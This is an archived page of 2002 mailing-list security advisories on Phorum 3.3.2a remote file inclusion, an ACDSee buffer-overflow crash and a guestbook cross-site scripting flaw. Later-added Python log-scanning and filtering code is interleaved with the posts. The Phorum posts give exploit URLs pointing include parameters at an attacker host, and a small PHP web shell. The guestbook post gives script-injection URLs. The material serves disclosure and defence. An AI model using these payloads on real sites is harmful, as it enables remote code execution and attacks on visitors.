Phorum 3.3.2a has another bug for remote command execution

2002-05-18 Thread Markus Arndt

Target:
Phorum 3.3.2a (maybe older)

Description:
Phorum 3.3.2a lets remote users execute arbitrary code

Found by:
Markus Arndt [EMAIL PROTECTED]

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed in 3.3.2b

Details:


Another bug for remote command execution.
This time it's admin/actions/del.php
:)

Some code:
<?php
require "$include_path/delete_message.php";
delete_messages($id);
QueMessage("Message(s) $id and all children were deleted!<br>");
?>

The url to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

That url will make the script include http://[evilhost]/delete_message.php


GoGoGo and secure your boxes. :)





One other thing before I forget:
CSS-Attacks are possible on 2 files..

http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>


Markus Arndt [EMAIL PROTECTED]
http://skka.de

No more lost lottery tickets, no more forgotten winnings!
With the WEB.DE lottery service: http://tippen2.web.de/?x=13





Phorum 3.3.2a remote command execution

2002-05-17 Thread Markus Arndt

Target:
Phorum 3.3.2a (prior versions?)

Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitrary code.

Found by:
Markus Arndt [EMAIL PROTECTED]

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable to remote script inclusion:

./plugin/replace/plugin.php

let's see some code:



<?php
include("$PHORUM[settings_dir]/replace.php");

function mod_replace_read_body ($body) {
  global $pluginreplace;
  reset($pluginreplace);
  while(list($key,$val) = each($pluginreplace)) {
    $body = str_replace($key,$val,$body);
  }
  return $body;
}

$plugins["read_body"]["mod_replace"]="mod_replace_read_body";

?>


Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:

<?
echo("<?
system(\"\$cmd\");
?>");
?>

If it's not php-enabled simply:
<?
system($cmd);
?>
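Both Phorum advisories on this page (del.php with include_path, plugin.php with PHORUM[settings_dir]) come down to a request parameter being passed straight into require()/include(). As an added example, not part of the original posts or of Phorum, this Python script scans web-server access-log lines for parameters whose value is a remote URL. The Common Log Format, the hostname attacker.example and the three sample lines are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the two Phorum 3.3.2a advisories show being fed straight into
# require()/include() (names taken from the advisories above).
RFI_PARAMS = {"include_path", "PHORUM[settings_dir]"}
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)

# Common Log Format request field: "METHOD /path?query HTTP/x.y" (assumed format)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def find_remote_includes(line):
    """Return (param, value) pairs whose value is a URL.  The two Phorum
    parameters are always reported; any other parameter is reported only when
    the requested script is a .php file, so redirect-style parameters on
    static paths do not clutter the result."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value) and (name in RFI_PARAMS or parts.path.endswith(".php")):
            hits.append((name, value))
    return hits

def scan_log(text):
    """Map (source IP, script path) of every flagged line to its suspicious parameters."""
    findings = {}
    for line in text.splitlines():
        hits = find_remote_includes(line)
        if hits:
            m = LOG_LINE.match(line)
            findings[(m.group("ip"), urlsplit(m.group("target")).path)] = hits
    return findings

# Constructed sample lines (not real traffic): the two attack shapes from the
# advisories, then one ordinary forum request.
SAMPLE_LOG = """\
10.0.0.5 - - [18/May/2002:10:01:02 +0200] "GET /phorum/admin/actions/del.php?include_path=http://attacker.example&cmd=ls HTTP/1.0" 200 512
10.0.0.6 - - [17/May/2002:09:12:44 +0200] "GET /phorum/plugin/replace/plugin.php?PHORUM%5Bsettings_dir%5D=http://attacker.example&cmd=id HTTP/1.0" 200 233
10.0.0.7 - - [17/May/2002:09:13:10 +0200] "GET /phorum/read.php?f=1&i=42&t=42 HTTP/1.0" 200 8710
"""

if __name__ == "__main__":
    for (ip, path), hits in scan_log(SAMPLE_LOG).items():
        print(ip, path, hits)
```

The same check belongs on the server side too: a fixed, local settings directory and no include path taken from the request removes the bug rather than just spotting it.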




Markus Arndt [EMAIL PROTECTED]
http://skka.de






Possible Buffer Overflow in ACDSee 4.0

2002-05-10 Thread Markus Arndt

While playing around with ACDSee's photo album files (.ais extension) I noticed
a bug that seems to me like a buffer overflow.

ACDSee's .ais files are built up like this:


[absolutepath]\filename.gif description  
[absolutepath]\some.gif mydog
[absolutepath]\dunno.gif mycat


I filled one description up to 260 chars.
Then I loaded the file in ACDSee. Nothing special..

But when I wanted to see the picture's properties the app just crashed.
It seems that ACDSee can't handle more than 256 chars in the description
when displaying the properties dialog (or maybe I'm just an idiot ;D).

Grab a sample photo album file at http://skka.de/acdsee_bug.zip.
The included gif has to be placed directly on c:\ because ACDSee only
allows absolute paths in these files and I couldn't give any relative
path to the gif.. :/
Otherwise the .ais file will seem not to contain any pictures and you can't
trigger the bug by selecting the pic's properties in the context menu.

Maybe somebody finds out more..

Markus Arndt [EMAIL PROTECTED]






Philip Chinery's Guestbook 1.1 fails to filter out js/html

2002-04-22 Thread Markus Arndt

Target:
 Philip Chinery's Guestbook 1.1 (maybe older versions?)

Vendor:
 http://www.sector7g.de.vu

Notified Vendor:
 Sure

Affected Systems:
 Webservers that run Philip Chinery's Guestbook 1.1

Found by:
 Markus Arndt [EMAIL PROTECTED]

Short Description:
 Philip Chinery's Guestbook 1.1 fails to filter out JScript/HTML (CrossSiteScripting)

This nice lil' guestbook lets the owner choose to filter out JScript and/or
HTML entries..
Let's see the start of its sub where it saves an entry:

---code starts---

sub SaveData
{
if($kill_html == 1) {
$Text =~ s/<([^>]|\n)*>//g;
}

if($kill_html == 2) {
$Text =~ s/</&lt;/g;
$Text =~ s/>/&gt;/g;
}

if ($kill_java) {
$Text =~ s/<!--(.|\n)*-->//g;
}
$Text   =~ s/\n/&nbsp;<br>/g;
$Text   =~ tr/|/ /;
$Text   =~ s/\t/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/g;
$Text   =~ s/\cM//g;

---code ends---

That's all it filters out.. As we can see it only filters the comment itself that a
user wrote!
For example the fields Name, EMail or Homepage are NOT checked!


So let's build an url to exploit this..

http://[target]/cgi-bin/guestbook.pl?action=sign&cwrite=none&Name=<script>alert("gotcha!");</script>&[EMAIL PROTECTED]&Text=css%20example

This would post a message that would display an alertbox on a visitor's screen
when accessing the gb..

As I noticed the guestbook logs IP addresses but doesn't prevent spam.
It also automatically redirects posters back to the main guestbook page.
That makes it very easy to post entries that e.g. force visitors to spam the guestbook
(really annoying).
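To make the advisory's point concrete, here is an added example (a Python port, not the guestbook's Perl and not from the original post) that applies the quoted SaveData filter to the Text field only and compares it with a variant that escapes every field. The regex semantics of the port and the sample entry are assumptions made for the example.

```python
import html
import re

# Python port (assumed semantics) of the Perl filter the advisory quotes from
# SaveData: kill_html == 1 strips tags, kill_html == 2 entity-encodes < and >.
# As in the guestbook, it touches the Text field only.
def filter_text_only(entry, kill_html=2, kill_java=True):
    text = entry["Text"]
    if kill_html == 1:
        text = re.sub(r"<([^>]|\n)*>", "", text)       # $Text =~ s/<([^>]|\n)*>//g;
    if kill_html == 2:
        text = text.replace("<", "&lt;").replace(">", "&gt;")
    if kill_java:
        text = re.sub(r"<!--(.|\n)*-->", "", text)      # $Text =~ s/<!--(.|\n)*-->//g;
    text = text.replace("\n", "&nbsp;<br>").replace("|", " ")
    text = text.replace("\t", "&nbsp;" * 8).replace("\r", "")
    saved = dict(entry)
    saved["Text"] = text
    return saved

# Hardened variant (added here, not the guestbook's code): every stored field,
# Name, EMail and Homepage included, is HTML-escaped before it is written out.
def filter_all_fields(entry):
    saved = {}
    for field, value in entry.items():
        escaped = html.escape(value.replace("\r", ""), quote=True)
        escaped = escaped.replace("|", " ").replace("\t", "&nbsp;" * 8)
        saved[field] = escaped.replace("\n", "&nbsp;<br>")
    return saved

def contains_active_html(value):
    """True if a stored value still carries a raw tag that a browser would render."""
    return re.search(r"<[a-zA-Z/!]", value) is not None

# Constructed entry shaped like the advisory's URL: payload in Name, plain Text.
SAMPLE_ENTRY = {
    "Name": '<script>alert("gotcha!");</script>',
    "EMail": "someone@example.invalid",
    "Homepage": "http://example.invalid/",
    "Text": "css example <b>bold</b>",
}

if __name__ == "__main__":
    for label, fn in (("text only", filter_text_only), ("all fields", filter_all_fields)):
        saved = fn(SAMPLE_ENTRY)
        print(label, {k: contains_active_html(v) for k, v in saved.items()})
```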


Sorry for bad English, hope you can understand what I'm talkin' about. ;)


Markus Arndt [EMAIL PROTECTED]
http://skka.de
__
100 MB and even more good reasons! Sign up now and benefit. There's more
in it for you at http://club.web.de/?mc=021103